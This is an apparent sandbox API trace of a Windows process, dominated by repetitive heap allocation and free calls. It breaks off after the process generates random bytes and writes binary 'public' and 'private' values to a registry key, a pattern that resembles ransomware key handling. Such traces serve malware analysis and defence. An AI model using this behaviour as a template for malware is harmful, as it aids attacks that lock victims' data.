returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.053] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.054] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.055] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.056] GetProcessHeap () returned 0x4f10000 [0061.056] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.057] GetProcessHeap () returned 0x4f10000 [0061.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.058] GetProcessHeap () returned 0x4f10000 [0061.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.284] GetProcessHeap () returned 0x4f10000 [0061.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.300] GetProcessHeap () returned 0x4f10000 [0061.300] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.305] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x50084d0, Size=0x80) returned 0x4f708d8 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a578 | out: hHeap=0x4f10000) returned 1 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12218 | out: hHeap=0x4f10000) returned 1 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f7f8a8 | out: hHeap=0x4f10000) returned 1 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12218 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12218, Size=0x80) returned 0x4f70960 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f709e8 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f709e8 | out: hHeap=0x4f10000) returned 1 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70850 | out: hHeap=0x4f10000) returned 1 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d121f8 | out: hHeap=0x4f10000) returned 1 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x50084c0 | out: hHeap=0x4f10000) returned 1 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x50084c0 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x50084d0 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x50084e0 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x5008510 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d121f8 [0061.305] GetProcessHeap () returned 0x4f10000 [0061.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12218 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12238 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12228 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x5008510, Size=0x100) returned 0x4f43fb0 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x5008510 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x5008510, Size=0x100) returned 0x4f440b8 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x100) returned 0x4f441c0 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f442c8 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f442c8 | out: hHeap=0x4f10000) returned 1 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43fb0 | out: hHeap=0x4f10000) returned 1 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x4f441c0, Size=0x104) returned 0x4f8a578 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12238, Size=0x8) returned 0x7d12228 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12228, Size=0x104) returned 0x4f8a690 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d121f8, Size=0x8) returned 0x7d12228 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12218, Size=0x8) returned 0x7d121f8 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12218 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12238 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x4) returned 0x7d12248 [0061.306] GetProcessHeap () returned 0x4f10000 [0061.306] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12248 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d121f8 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12218 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12218 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12218, Size=0x100) returned 0x4f441c0 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x100) returned 0x4f43fb0 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f442c8 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f442c8 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a578 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f441c0 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f440b8 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x50084c0 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12238 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x50084d0 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43fb0 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x50084e0 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12208 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x4f57248, Size=0x100) returned 0x4f43fb0 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.307] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0061.307] GetProcessHeap () returned 0x4f10000 [0061.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.308] GetProcessHeap () returned 0x4f10000 [0061.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.308] GetProcessHeap () returned 0x4f10000 [0061.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x50084b0 | out: hHeap=0x4f10000) returned 1 [0061.308] GetProcessHeap () returned 0x4f10000 [0061.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0061.308] GetProcessHeap () returned 0x4f10000 [0061.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70960 | out: hHeap=0x4f10000) returned 1 [0061.308] RegSetValueExA (in: hKey=0x608, lpValueName="public", Reserved=0x0, dwType=0x3, lpData=0x40f068*, cbData=0x100 | out: lpData=0x40f068*) returned 0x0 [0061.308] SystemFunction036 (in: RandomBuffer=0x17e3a8, RandomBufferLength=0x20 | out: RandomBuffer=0x17e3a8) returned 1 [0061.314] GetProcessHeap () returned 0x4f10000 [0061.314] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x220) returned 0x7d0dc28 [0061.314] RegSetValueExA (in: hKey=0x608, lpValueName="private", Reserved=0x0, dwType=0x3, lpData=0x7d0dc28*, cbData=0x220 | out: lpData=0x7d0dc28*) returned 0x0 [0061.314] GetProcessHeap () returned 0x4f10000 [0061.315] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x2d9) returned 